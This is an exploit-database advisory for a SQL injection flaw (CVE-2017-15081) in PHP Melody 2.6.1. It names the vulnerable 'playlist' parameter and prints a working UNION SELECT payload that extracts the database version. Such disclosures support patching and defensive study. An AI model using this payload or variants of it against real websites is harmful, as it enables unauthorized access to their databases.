PHP Melody 2.6.1 - SQL Injection

EDB-ID: 43062
Author: Venkat Rajgor
Published: 2017-10-28
CVE: CVE-2017-15081
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 [+] Author : Venkat Rajgor 
[+] Email : [email protected]
[+] Vulnerability : SQL injection
###################################################
E-mail ID : [email protected]
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

Related Posts